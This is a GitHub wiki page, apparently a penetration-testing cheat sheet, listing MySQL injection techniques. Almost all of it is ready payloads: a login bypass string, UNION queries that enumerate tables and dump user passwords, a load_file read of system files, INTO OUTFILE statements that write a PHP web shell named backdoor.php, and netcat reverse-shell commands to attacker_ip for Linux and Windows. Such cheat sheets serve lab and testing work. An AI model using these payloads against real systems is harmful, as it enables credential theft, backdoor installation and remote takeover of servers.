-
Notifications
You must be signed in to change notification settings - Fork 14
MySQL Injection
lethanhtung01011980 edited this page Jun 16, 2020
·
24 revisions
- Mainly for PHP and MySQL
- To attack on non-validated user inputs
- To know the database
- To execute remote code
-
SQL injection for PHP, can put in HTML textbox:
<?php echo system($_REQUEST["cmd"]); ?>
. Then execute with custom cmdhttp://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=uname
Attack on non-validated username and password
- Key in username as
wronguser' or 1=1 LIMIT 1;#
Basic check for SQL injection
- Key in ' or " in text input to see if any debug error.
- Key in ' or " in GET parameters to see if any debug error.
- Key in and 1 = 1 and and 1 = 2 behind the suspected parameter to see the output difference.
Check if 7th column exists
- http://victim_ip/comment.php?id=738 order by 7
If we have 6 columns, we can check which columns are display.
- http://victim_ip/comment.php?id=738 union all select 1,2,3,4,5,6
Assume 5th column can be shown.
- Get MySql version: http://victim-ip/comment.php?id=738 union all select 1,2,3,4,@@version,6
- Get Mysql user: http://victim-ip/comment.php?id=738 union all select 1,2,3,4,user(),6
- Get all table names: http://victim-ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables
- Get users: http://victim-ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
- Get users and passwords: 0x3a is ":". http://victim_ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users
Notes:
- Linux may have user permission restriction.
To load file
http://victim_ip/comment.php?id=738 union select 1,2,3,4,load_file('c:/windows/system32/drivers/etc/hosts'),6 FROM users
To create file using outfile
http://victim-ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
- To put behind vulnerable param:
' union all select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/var/www/backdoor.php' #
Sample reverse shell payload for "cmd"
- Linux victim to execute reverse shell:
nc -nv attacker_ip 4444 -e /bin/bash
- Windows victim to execute reverse shell:
nc.exe -nv attacker_ip 4444 -e cmd.exe